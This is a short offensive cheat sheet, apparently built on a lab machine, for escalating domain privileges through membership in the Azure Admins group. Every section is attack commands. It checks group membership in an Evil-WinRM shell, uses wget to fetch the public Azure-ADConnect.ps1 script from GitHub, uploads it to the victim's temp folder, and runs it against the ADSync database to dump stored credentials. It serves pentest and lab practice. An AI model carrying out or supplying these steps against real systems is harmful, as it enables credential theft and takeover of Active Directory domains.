Azure Admins (Domain Privilege Escalation)

Detect

*Evil-WinRM* PS C:\Users\mhope> net user mhope | findstr "Group"

Global Group memberships      *Azure Admins

Abuse

Azure-ADConnect.ps1

# attacker
wget -q "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"
# victim
*Evil-WinRM* PS C:\Users\mhope> cd $env:TEMP
*Evil-WinRM* PS C:\Users\mhope\AppData\Local\Temp> upload Azure-ADConnect.ps1

Dump Credentials

# victim
*Evil-WinRM* PS C:\Users\mhope\AppData\Local\Temp> Import-Module .\Azure-ADConnect.ps1
*Evil-WinRM* PS C:\Users\mhope\AppData\Local\Temp> Azure-ADConnect -server 10.129.179.26 -db ADSync